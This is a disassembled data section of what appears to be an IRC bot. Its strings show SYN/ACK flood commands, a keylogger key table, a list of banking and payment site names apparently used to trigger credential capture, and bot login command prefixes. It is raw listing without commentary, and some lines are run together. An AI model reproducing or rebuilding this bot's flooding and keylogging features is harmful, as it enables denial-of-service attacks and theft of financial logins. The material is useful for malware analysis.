dword_4210DC dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA dd 7C91043Dh
dword_4210E4 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_409307+4A�r
dword_4210E8 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeap ; sub_409307+40�r ...
dd 7C80B9A0h
dword_4210F0 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemory dd 7C812D56h
dword_4210F8 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_4210FC dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA dd 7C82F7A0h, 7C80FE82h, 7C80FF19h, 7C80B905h, 7C80945Ch
dd 7C831CB8h, 7C831C45h, 7C802367h, 7C8329D9h, 7C812782h
dd 7C835DCAh, 7C812ADEh
dword_421130 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA dd 7C81AE17h, 7C85F90Fh, 7C80DDFEh
dword_421140 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_421144 dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipe dd 7C8310F2h, 7C814EEAh, 7C80A7D4h, 7C81CDDAh
dword_421158 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; ___:0041CFAB�r ...
dd 7C8216A4h, 7C831EABh, 7C809920h, 7C802520h, 7C80E93Fh
dd 7C81CE03h, 7C835E8Fh, 7C801E16h, 7C80BAA1h, 7C80D262h
dd 7C830B14h, 7C8350BFh, 7C80176Bh, 7C9179FDh, 7C801EEEh
dd 7C812F1Dh, 7C8111DAh, 7C810EF8h, 7C812BB6h
dword_4211A8 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFree align 10h
dd 77C019FFh, 77C01A50h, 77C018BAh, 0
dd 71AB4428h, 71AB664Dh, 71AB3EA1h, 71AB3E00h, 71AB88D3h
dd 71AB2DC0h, 71AB4544h, 71AC1028h, 71AB2BF4h, 71AB2B66h
dword_4211E8 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_40381E+9B�r
dword_4211EC dd 71AB428Ah ; resolved to->WS2_32.send ; sub_4033C9+26B�r ...
dword_4211F0 dd 71AB2B66h ; resolved to->WS2_32.ntohs dd 71AB3F41h, 71AB3B91h, 71AB4519h, 71AB406Ah, 71AB9639h
dd 2 dup(0)
dword_421210 dd 0 dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh
byte_42160C db 8Dh ; DATA XREF: sub_419343+4A�r
db 0EFh, 2, 2Dh
dbl_421610 dq 9.765625e-4 ; DATA XREF: sub_40D091+2BD�r
; sub_40D091+2D8�r ...
dbl_421618 dq -3.0517578125e-5 ; DATA XREF: sub_415EF7+1E�r
dd 0FFFFFFFFh, 4191C6h, 4191DAh
byte_42162C db 6 ; DATA XREF: sub_419343:loc_41939A�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: ___:off_43B59C�o
unicode 0, <(null)>,0
align 4
aNull_0 db '(null)',0 ; DATA XREF: ___:off_43B598�o
align 10h
dword_4216A0 dd 2 dup(0) ; sub_41D6F3+39�o ...
dword_4216A8 dd 0FFFFFFFFh, 41BD3Bh, 41BD3Fh, 0FFFFFFFFh, 41BDEFh, 41BDF3h
; DATA XREF: sub_41BC2B+5�o
dbl_4216C0 dq 1.0 ; DATA XREF: sub_41C478+2A�r
dbl_4216C8 dq 4.195835e6 ; DATA XREF: sub_41C478+F�r
dbl_4216D0 dq 3.145727e6 ; DATA XREF: sub_41C478+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_41C4B6+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_41C4B6�o
align 10h
dbl_421700 dq 0.0 ; DATA XREF: sub_41C587+6�r
dword_421708 dd 30302B65h, 30h, 746E7572h, 20656D69h, 6F727265h, 2072h
; DATA XREF: sub_41C5DD+93�o
dd 534F4C54h, 72652053h, 0D726F72h, 0Ah, 474E4953h, 72726520h
dd 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: ___:off_43BAEC�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_41D415+119�o
align 10h
asc_4219C0 db 0Ah ; DATA XREF: sub_41D415+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_41D415+D3�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_41D415+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41D415+7D�o
align 10h
dword_421A00 dd 0FFFFFFFFh, 41D7ECh, 41D7F0haSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_41DD12+A�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_41EE5D+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_41EE5D+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_41EE5D+24�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_41F7F0:loc_41F8E5�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_41F7F0+D8�o
align 10h
a1Ind db '1#IND',0 ; DATA XREF: sub_41F7F0+C7�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_41F7F0+AD�o
align 10h
dword_421AA0 dd 0FFFFFFFFh, 41FFF9h, 41FFFDh, 0FFFFFFFFh, 420068h, 42006Ch
; DATA XREF: sub_41FE42+5�o
dword_421AB8 dd 0FFFFFFFFh, 4206FCh, 420700h, 0FFFFFFFFh, 420779h, 42077Dh
; DATA XREF: sub_4205FA+5�o
dword_421AD0 dd 0FFFFFFFFh, 420971h, 420975h, 0FFFFFFFFh, 4209CEh, 4209D2h
; DATA XREF: sub_420885+5�o
dd 5 dup(2E5DFEC1h), 5 dup(1C3E825Eh), 5 dup(2A993EADh)
dd 70h dup(0)
dd 2A993EADh, 3 dup(0)
dd 1C3E825Eh, 12h dup(0)
dd 2E5DFEC1h, 4AFh dup(0)
dword_423000 dd 0 dd offset sub_40417B
dword_423008 dd 0 dword_42300C dd 0 dd offset sub_41C3C0
dd offset sub_41D5D2
dword_423018 dd 0 dword_42301C dd 0 dd offset sub_41D677
dword_423024 dd 0 dword_423028 dd 0 dword_42302C dd 0 unk_423030 db 2 ; DATA XREF: sub_401000+5B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDoneWithFloodI db ' Done with flood (%iKB/sec).',0
align 4
unk_423068 db 2 ; DATA XREF: sub_4010B2+302�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSendErrorD_ db ' Send error: <%d>.',0
align 4
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_4010B2:loc_4011DE�o
; sub_40F6F1+2767�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_4010B2:loc_4011C2�o
; sub_40F6F1+2750�o
align 10h
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_4010B2+F1�o
; sub_40F6F1+2739�o
align 4
unk_4230BC db 2 ; DATA XREF: sub_401447+397�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDoneWithSFlood db ' Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
unk_42311C db 2 ; DATA XREF: sub_401447+307�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSendingPa db ' Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
unk_42317C db 2 ; DATA XREF: sub_401447+12A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aInvalidTargetI db ' Invalid target IP.',0
align 4
unk_4231AC db 2 ; DATA XREF: sub_401447+C2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSetsockop db ' Error: setsockopt() failed, returned: <%d>.',0
align 4
unk_4231F4 db 2 ; DATA XREF: sub_401447+49�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSocketFai db ' Error: socket() failed, returned: <%d>.',0
align 4
aSupersynDoneWi db '[SUPERSYN]: Done with flood (%iKB/sec)',0 ; DATA XREF: sub_40182E+48�o
align 10h
dword_423260 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_4019D1+48�o
dd 2BBBB02h
aDoneWithFloo_0 db ' Done with flood (%iKB/sec).',0
align 4
dword_423298 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401A6D+27D�o
dd 2BBBB02h
aSendErrorD__0 db ' Send error: <%d>.',0
dword_4232C4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D79+4EB�o
dd 2BBBB02h
aDoneWithSFlo_0 db ' Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
dword_423324 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D79+44F�o
dd 2BBBB02h
aErrorSending_0 db ' Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
aRandom db 'random',0 ; DATA XREF: sub_401D79+312�o
; sub_40F6F1+2D3D�o ...
align 4
aAck db 'ack',0 ; DATA XREF: sub_401D79+2F2�o
; sub_40F6F1+2D26�o
aSyn db 'syn',0 ; DATA XREF: sub_401D79+2D2�o
; sub_40F6F1+2D0E�o
dword_423394 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D79+15F�o
dd 2BBBB02h
aInvalidTarge_0 db ' Invalid target IP.',0
align 4
dword_4233C4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D79+EE�o
dd 2BBBB02h
aErrorSetsock_0 db ' Error: setsockopt() failed, returned: <%d>.',0
align 4
dword_42340C dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D79+70�o
dd 2BBBB02h
aErrorSocketF_0 db ' Error: socket() failed, returned: <%d>.',0
align 10h
aEGold db 'e-gold',0 ; DATA XREF: sub_4022BD+13�o
align 4
dd 1Eh dup(0)
aPaypal_1 db 'PayPal',0
align 4
dd 1Eh dup(0)
aStormpay db 'StormPay',0
align 4
dd 1Dh dup(0)
aVodafone db 'Vodafone',0
align 4
dd 1Dh dup(0)
dd 74736F50h, 74492065h, 61696C61h, 656Eh, 1Ch dup(0)
aEbay db 'eBay',0
align 4
dd 1Eh dup(0)
dd 6F686159h, 216Fh, 1Eh dup(0)
dd 636E6142h, 65532061h, 616C6Ch, 1Dh dup(0)
aEmail db 'Email',0
align 4
dd 1Eh dup(0)
aBankOfAmerica db 'Bank Of America',0
dd 1Ch dup(0)
aExploit db 'exploit',0
dd 1Eh dup(0)
aBenvenutoAGmai db 'Benvenuto a gmail',0
align 4
dd 1Bh dup(0)
dd 6E734Dh, 1Fh dup(0)
aPagamento db 'pagamento',0
align 4
dd 1Dh dup(0)
aPaga db 'paga',0
align 4
dd 1Eh dup(0)
dword_423BD0 dd 8 dword_423BD4 dd 62h, 62000000h, 2 dup(0) dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_424304 dd 38h, 38000000h, 2 dup(0) dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
dword_42433C dd 7325h ; sub_402E92+221�o ...
dword_424340 dd 28207325h, 297325h ; sub_40BDAD+EB�o
dword_424348 dd 2BBBB02h, 20732520h, 2ABAB02h, 65522820h, 6E727574h
; DATA XREF: sub_402368+3FA�o
dd 25282029h, 2973h
dword_424364 dd 2BBBB02h, 20732520h, 2ABAB02h, 65522820h, 6E727574h
; DATA XREF: sub_402368+3D9�o
dd 29h
dword_42437C dd 2BBBB02h, 20732520h, 2ABAB02haBufferFullS db ' (Buffer full) (%s)',0
dword_42439C dd 2BBBB02h, 20732520h, 2ABAB02h, 75422820h, 72656666h
; DATA XREF: sub_402368+382�o
dd 6C756620h, 296Ch
dword_4243B8 dd 2BBBB02h, 20732520h, 2ABAB02haChangedWindows db ' (Changed Windows: %s)',0
align 4
dword_4243DC dd 2BBBB02h, 20732520h, 2ABAB02h, 0 ; sub_402368+223�o
dword_4243EC dd 0BBBB0220h, 73252002h, 0ABAB0220h, 2002h, 0off_424400 dd offset off_424C78 ; DATA XREF: sub_402822+29E�r
dd offset off_424C74
dd offset off_424C70
dd offset aHttp ; "HTTP"
dword_424410 dd 6F6C2E3Ah, 6E6967h, 3 dup(0)dword_424424 dd 0 dd 6F6C2C3Ah, 6E6967h, 4 dup(0)
dd 6F6C213Ah, 6E6967h, 4 dup(0)
dd 6F6C403Ah, 6E6967h, 4 dup(0)
dd 6F6C243Ah, 6E6967h, 4 dup(0)
dd 6F6C253Ah, 6E6967h, 4 dup(0)
dd 6F6C5E3Ah, 6E6967h, 4 dup(0)
dd 6F6C263Ah, 6E6967h, 4 dup(0)
dd 6F6C2A3Ah, 6E6967h, 4 dup(0)
dd 6F6C2D3Ah, 6E6967h, 4 dup(0)
dd 6F6C2B3Ah, 6E6967h, 4 dup(0)
dd 6F6C2F3Ah, 6E6967h, 4 dup(0)
dd 6F6C5C3Ah, 6E6967h, 4 dup(0)
dd 6F6C3D3Ah, 6E6967h, 4 dup(0)
dd 6F6C3F3Ah, 6E6967h, 4 dup(0)
dd 6F6C273Ah, 6E6967h, 4 dup(0)
dd 6F6C603Ah, 6E6967h, 4 dup(0)
dd 6F6C7E3Ah, 6E6967h, 4 dup(0)
dd 6F6C203Ah, 6E6967h, 4 dup(0)
dd 75612E3Ah, 6874h, 4 dup(0)
dd 75612C3Ah, 6874h, 4 dup(0)
dd 7561213Ah, 6874h, 4 dup(0)
dd 7561403Ah, 6874h, 4 dup(0)
dd 7561243Ah, 6874h, 4 dup(0)
dd 7561253Ah, 6874h, 4 dup(0)
dd 75615E3Ah, 6874h, 4 dup(0)
dd 7561263Ah, 6874h, 4 dup(0)
dd 75612A3Ah, 6874h, 4 dup(0)
dd 75612D3Ah, 6874h, 4 dup(0)
dd 75612B3Ah, 6874h, 4 dup(0)
dd 75612F3Ah, 6874h, 4 dup(0)
dd 75615C3Ah, 6874h, 4 dup(0)
dd 75613D3Ah, 6874h, 4 dup(0)
dd 75613F3Ah, 6874h, 4 dup(0)
dd 7561273Ah, 6874h, 4 dup(0)
dd 7561603Ah, 6874h, 4 dup(0)
dd 75617E3Ah, 6874h, 4 dup(0)
dd 7561203Ah, 6874h, 4 dup(0)
dd 64692E3Ah, 5 dup(0)
dd 64692C3Ah, 5 dup(0)
dd 6469213Ah, 5 dup(0)
dd 6469403Ah, 5 dup(0)
dd 6469243Ah, 5 dup(0)
dd 6469253Ah, 5 dup(0)
dd 64695E3Ah, 5 dup(0)
dd 6469263Ah, 5 dup(0)
dd 64692A3Ah, 5 dup(0)
dd 64692D3Ah, 5 dup(0)
dd 64692B3Ah, 5 dup(0)
dd 64692F3Ah, 5 dup(0)
dd 64695C3Ah, 5 dup(0)
dd 64693D3Ah, 5 dup(0)
dd 64693F3Ah, 5 dup(0)
dd 6469273Ah, 5 dup(0)
dd 6469603Ah, 5 dup(0)
dd 64697E3Ah, 5 dup(0)
dd 6469203Ah, 5 dup(0)
dd 61682E3Ah, 6E696873h, 4 dup(0)
dd 6168213Ah, 6E696873h, 4 dup(0)
dd 6168243Ah, 6E696873h, 4 dup(0)
dd 6168253Ah, 6E696873h, 4 dup(0)
dd 65732E3Ah, 65727563h, 4 dup(0)
dd 6573213Ah, 65727563h, 4 dup(0)
dd 6C2E3Ah, 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
dd 79732E3Ah, 6Eh, 4 dup(0)
dd 7973213Ah, 6Eh, 4 dup(0)
